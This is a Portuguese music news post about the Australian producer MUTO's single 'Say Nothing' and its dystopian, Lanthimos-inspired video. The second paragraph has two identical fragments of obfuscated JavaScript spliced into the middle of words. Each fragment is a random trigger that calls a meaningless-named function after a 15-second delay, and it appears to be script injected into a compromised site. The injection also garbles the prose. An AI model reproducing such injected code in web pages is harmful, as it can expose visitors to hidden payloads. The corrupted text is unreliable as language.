MUTO e seu futuro distópico inspirado em Yorgos Lanthimos no clipe de “Say Nothing”

O produtor australiano MUTO começa a chamar a atenção do mundo com sua eletrônica groove sedutora – que soa como uma combinação de Flume com Jamie xx – e planeja seu EP de estreia para este ano encabeçado pelo single pop futurista “Say Nothing”. A canção é uma jornada sintética eletrônica sombrio que encontra aconchego no vocal caloroso de Emerson Leif.

Reinterpretandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando a capacidade de MUTO colocar luz e escuridão em seu trabalho, o diretor Lexi Kiddo inspira-se em filmes como ‘Ex Machina’, ‘Não Me Abandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andone Jamais’ e produções do cineasta Yorgos Lanthimos (de ‘O Sacrifício do Cervo Sagrado’ e ‘O Lagosta’) no videoclipe da canção. Com o pano de fundo de uma fazenda moderna, onde tudo não é o que parece, a peça distópica segue a narrativa de três irmãos vivendo com uma figura matriarcal idosa.